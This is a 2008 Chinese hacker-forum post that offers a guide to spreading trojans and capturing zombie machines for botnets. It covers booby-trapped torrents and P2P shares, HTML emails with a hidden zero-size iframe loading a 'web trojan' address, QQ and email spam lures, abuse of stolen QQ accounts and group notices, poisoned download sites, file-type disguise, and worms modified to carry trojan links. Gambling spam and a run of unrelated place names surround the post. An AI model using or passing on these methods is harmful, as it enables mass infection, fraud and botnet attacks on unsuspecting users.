金年会 金字招牌诚信至上,金年会 金字招牌诚信至上,金年会 金字招牌诚信至上,金年会 金字招牌诚信至上

 找回密碼
 注冊

QQ登錄

只需一步,快速開(kāi)始

查看: 1424|回復: 1
打印 上一主題 下一主題

[分享] 抓雞寶典---木馬傳播狂抓肉雞終級大餐

跳轉到指定樓層
1#
tianshiren 發(fā)表于 2008-11-6 15:16:56 | 只看該作者 回帖獎勵 |倒序瀏覽 |閱讀模式 來(lái)自 中國山東青島

馬上注冊,結交更多好友,享用更多功能。

您需要 登錄 才可以下載或查看,沒(méi)有帳號?注冊

x
一.目前流行木馬傳播技術(shù).
1.用BT制作木馬種子
利用BT制作木馬種子的教程網(wǎng)上也發(fā)布了很多,這里主要找一款具有誘惑性的軟件

然后捆綁上自己的木馬,做成種子,最后發(fā)布出去.相信利用BT抓雞速度可是超快哦.


2.利用PP共享自己捆了木馬的軟件或電影.
方法同BT一樣,要找誘惑性電影或軟件,捆上自己的木馬,然后共享自己的目錄,這樣人

家就會(huì )通過(guò)搜索找到你的軟件或電影.這里電影要配合網(wǎng)頁(yè)木馬.可以參看RealOnePla

ye木馬制作.在黑鷹可以找到.當你一打開(kāi)我們的電影時(shí)就會(huì )打開(kāi)我們制作過(guò)的網(wǎng)頁(yè)木

馬.這樣看電影也會(huì )中我們的馬.

3.利用QQ郵箱傳播木馬.
這里主要點(diǎn)HTML格式----在里面寫(xiě)上以下這段代碼:

<body > </body>

當人家一打開(kāi)你發(fā)過(guò)去的郵件時(shí),就會(huì )中我們的木馬.

4.QQ群發(fā)網(wǎng)頁(yè)木馬!
首先,你要申請多個(gè)QQ號,然后找款QQ消息群發(fā)器(黑鷹網(wǎng)站可以找到大量相關(guān)QQ群

發(fā)信息軟件,)再然后要加上非常具有誘惑性的消息(肉雞的多與少與這個(gè)直接相關(guān)

,),騙取人家點(diǎn)你的網(wǎng)址。最后,在晚上時(shí)可以?huà)煸陔娔X上群發(fā)帶有網(wǎng)頁(yè)木馬的信

息。相信只要你的信息夠誘惑,肉雞也是成群的。


5.利用163郵箱傳播網(wǎng)頁(yè)木馬。

同樣,這里用HTML格式,然后填上以下代碼:

</html><iframe src="你的網(wǎng)頁(yè)木馬地址" name="zhu" width="0" height="0"

frameborder="0">

對方只要一打開(kāi),就會(huì )中我們的網(wǎng)頁(yè)木馬。

這里發(fā)送郵件時(shí)注意一些技巧,我們要加入一些社會(huì )工程會(huì )。比如對方是愛(ài)好車(chē)的,

你就在郵件標題上寫(xiě)上關(guān)于車(chē)的誘惑性標題。目的只有一個(gè),讓他點(diǎn)我們帶有網(wǎng)頁(yè)木

馬的郵件。


6.利用郵箱群發(fā)我們的網(wǎng)頁(yè)木馬。
這里要用到論壇郵箱提取器,這類(lèi)工具黑鷹也有下載,大家可以找一下。提取大量

郵箱后,配合FOXMAIL這款軟件進(jìn)行群發(fā)傳播帶有網(wǎng)頁(yè)木馬的郵件。這里也要注意技

巧,比如在一個(gè)游戲論壇提取的郵箱,你就可以偽裝本論壇發(fā)給廣大游戲玩家,提供

最新游戲外掛下載.然后寫(xiě)上自己的網(wǎng)頁(yè)木馬.大部分都認為信息的真實(shí)性而點(diǎn)擊.從

而中我們的木馬. 這里還可以配合利用HTML格式群發(fā)我們的網(wǎng)頁(yè)木馬效果可更佳!


7.捆綁欺騙
這也是比較常用的傳播木馬技術(shù).把木馬捆在游戲,流行軟件上,配合以上方法,QQ,郵

箱,BT,論壇,等發(fā)布捆了木馬的軟件.騙取點(diǎn)我們的軟件,這樣也就同時(shí)中了我們的木

馬.關(guān)于捆綁技術(shù),本人做了三個(gè)非常具體詳細的語(yǔ)音動(dòng)畫(huà)教程.不懂的可以在黑鷹查

找本人的捆綁系列專(zhuān)輯教程.


8.攻破下載點(diǎn),捆上木馬放入下載點(diǎn).
當我們入侵到一些網(wǎng)站時(shí),看看是否開(kāi)放21服務(wù),也就是是否提供FTP服務(wù).若入侵到

這類(lèi)網(wǎng)站,恭喜你,你又可以得到大批量肉雞.你可以捆上自己的木馬然后放入下載點(diǎn)

等待人家上鉤吧!該方法抓雞的速度也非?.


9.釣魚(yú)式欺騙別人點(diǎn)擊你的網(wǎng)頁(yè)木馬地址或木馬.

釣魚(yú)式欺騙攻擊,也是國內最新發(fā)現的一種攻擊手法.主要利用社會(huì )工程會(huì )中的信任

關(guān)系騙他點(diǎn)擊.具體的利用方法:當盜了人家的QQ號,你可以看看有幾個(gè)群,然后在群里

放上自己捆綁的木馬.接著(zhù)在群里發(fā)幾條誘惑性的信息,比如最新申請6位QQ號軟件,

由于是在同一個(gè)群,可能他們對該QQ號主人有一定的信任度,所以點(diǎn)擊的可能性一定

很大.若該QQ號主人是群主或是管理員,哈哈,我們來(lái)個(gè)更毒的,干脆在公告上寫(xiě)上自己

的網(wǎng)頁(yè)木馬地址,然后說(shuō)本群剛建的專(zhuān)用網(wǎng)站!由于是群主,他們對他的信任度可想而

知.應該都會(huì )點(diǎn)的吧!還有一招,在他QQ的個(gè)人資料上或個(gè)人簽名上填上自己的網(wǎng)頁(yè)木

馬,然后說(shuō)剛建的個(gè)人網(wǎng)站.相信很多好友都會(huì )自動(dòng)點(diǎn)擊吧!


10.網(wǎng)站主頁(yè)掛馬
這個(gè)應該不用具體介紹吧,教程有N多.入侵到一個(gè)網(wǎng)站得到WEBSHELL后,接下來(lái)大家

是不是都忙著(zhù)找首頁(yè)掛馬了.

11.論壇漏洞掛馬
這里主要利用論壇的一些漏洞進(jìn)行掛馬,比如最近的動(dòng)網(wǎng)前臺提升管理員,然后掛馬,

動(dòng)網(wǎng)的個(gè)人資料過(guò)慮不嚴掛馬,還有投票掛馬等等.利用這些漏洞進(jìn)行掛馬.也有相關(guān)

教程,不是很清楚的可以在黑鷹找到.


12.文件類(lèi)型偽裝
這里主要把一些木馬服務(wù)端和一些文本文件捆綁在一起,然后通后自解壓方式或捆綁

器制作成文本文件類(lèi)型的可執行文件.但他以為打開(kāi)一個(gè)文本文件時(shí),雖然能正常運行

文本文件,其實(shí)已經(jīng)中了我們的木馬.真是神不知鬼不覺(jué)!本人也做過(guò)文件類(lèi)型欺騙的

動(dòng)畫(huà)教程.不是很清楚的也可以在黑鷹或動(dòng)畫(huà)吧找到本人的相關(guān)的教程.當然,還要以

偽裝成其它的類(lèi)型,比如把木馬制作成BMP圖片.BAT格式等.只要他一運行就會(huì )中

我們的馬.


14.其它的傳播技術(shù):比如制作圖片木馬,也有專(zhuān)門(mén)的圖片木馬制作工具,RM木馬制作

黑鷹也有相關(guān)教程,RealOnePlayer木馬制作,FLASH木馬制作.也有專(zhuān)門(mén)的制作工具,

網(wǎng)上可以找到相關(guān)工具.這些也是比較常用的傳播技術(shù).只要你有這方面的思路,都可

以在網(wǎng)上找到相關(guān)資料,自己嘗試制作.



      二.新型高級木馬傳播技術(shù)
下面介紹幾種比較高級的木馬傳播技術(shù).由于有一定的技術(shù)難度,所以隱蔽性比較強,

傳播速度也快,而且也幾乎不會(huì )被殺毒軟件查殺.


1.在WORD文檔中加入木馬文件
這種方法非常隱蔽,在WORD文檔尾加入木馬文件,只要別人點(diǎn)擊這個(gè)所謂的WORD文件就

會(huì )中木馬,這種方法主要是通過(guò)把一個(gè)EXE格式的木馬文件接在一個(gè)DOC文件的末尾,使

別人察覺(jué)不到木馬的存在,因此使之上當受騙.具體實(shí)現方法,比較復雜.本人也在進(jìn)一

步的研究之中.相信在不久這種方法就會(huì )流行起來(lái).現在主要被一些高手使用.


2.黑客工具綁木馬
其實(shí)這本來(lái)算不上高級的方法,但最近發(fā)現很多黑客軟件發(fā)布站,捆了木馬的工具躲過(guò)

管理員的檢測.照樣發(fā)布出來(lái),想像危害性有多大.其實(shí)他們就是利用人性的弱點(diǎn).黑客

工具本來(lái)被殺毒軟件查殺,捆了木馬的工具被查殺就不覺(jué)得奇怪了.就會(huì )放松警惕.從

而被他們利用.這一招是他們把黑客中的社會(huì )工程學(xué)利用的"恰到好處"!


3.用Z-file偽裝加密木馬程序

z-file偽裝加密軟件是臺灣華順科技產(chǎn)品,其經(jīng)過(guò)將文件壓縮加密之后,再以bmp圖像

文件格式顯示出來(lái),擴展名是bmp,執行后是幅普通的圖像.黑客會(huì )將木馬程序和小游戲

合拼,再用z-file加密及將此"混合體"發(fā)給受害者,由于看上去是圖像文件,受害者往

往不以為然,打開(kāi)后又只是一般的圖片,最可怕的地方還在于就連殺毒軟件也檢測不出

它內藏木馬.

4.偽裝成應用程序擴展組件
此類(lèi)屬于最難識別的特洛伊木馬,也是騙術(shù)最高的木馬,當然技術(shù)實(shí)現也有相當的難度

由于涉及到編程,所以我這里只簡(jiǎn)單介紹原理,以供參考.


采用內核插入式的嵌入方式,利用遠程插入線(xiàn)程技術(shù),嵌入DLL線(xiàn)程,或者掛接PSAPI,實(shí)

現木馬程序的隱藏.


5.通過(guò)QQ病毒,QQ蠕蟲(chóng),QQ尾巴或郵箱病毒,蠕蟲(chóng)進(jìn)行傳播.

相信利用這些技術(shù)進(jìn)行傳播木馬的速度是最快的.這里要下載病毒,蠕蟲(chóng)源代碼.進(jìn)行

分析.修改.加入我們的網(wǎng)頁(yè)木馬地址.然后傳播到網(wǎng)上,這樣就會(huì )一傳十,十傳百,指數

級上升,自動(dòng)為我們傳播木馬.這種傳播速度是驚人的.網(wǎng)上也可找到相關(guān)QQ蠕蟲(chóng)制作

器,菜鳥(niǎo)朋友就可以直接制作自己的帶有網(wǎng)頁(yè)木馬的蠕蟲(chóng)了.最近的唐山黑客就是利用

QQ尾巴傳播自己的木馬,感染并操控了四萬(wàn)多臺民用電腦.進(jìn)行對北京的一家音樂(lè )網(wǎng)站

進(jìn)行分布式DDOS攻擊.利用該技術(shù)是相當高級的,速度也是最快的.

嘿嘿!覺(jué)得還不錯的 頂下吧!
              本文章總節歸納了目前最流行的木馬傳播技術(shù)以及以后木馬傳播技術(shù)的發(fā)展趨勢,

內容相當本文章總節歸納了目前最流行的木馬傳播技術(shù)以及以后木馬傳播技術(shù)的發(fā)展趨勢,

內容相當豐富.相信看完本文你一定會(huì )成為養雞專(zhuān)業(yè)戶(hù).
豐富.相信看完本文你一定會(huì )成為養雞專(zhuān)業(yè)戶(hù)
頭像被屏蔽
2#
hack_r 發(fā)表于 2008-11-10 13:13:44 | 只看該作者 來(lái)自 中國河北衡水
提示: 作者被禁止或刪除 內容自動(dòng)屏蔽
您需要登錄后才可以回帖 登錄 | 注冊

本版積分規則

快速回復 返回頂部 返回列表
黄石市| 敦煌市| 建始县| 贵州省| 施秉县| 株洲县| 石城县| 民丰县| 南陵县| 陆良县| 彰化县| 开封市| 大方县| 庆阳市| 北京市| 海晏县| 云阳县| 周口市| 赤峰市| 综艺| 遂川县| 旬邑县| 唐河县| 申扎县| 社会| 鲜城| 循化| 广饶县| 六枝特区| 桑日县| 墨脱县| 恩施市| 大港区| 宾阳县| 运城市| 浦县| 墨竹工卡县| 肥城市| 黎川县| 阳高县| 射洪县|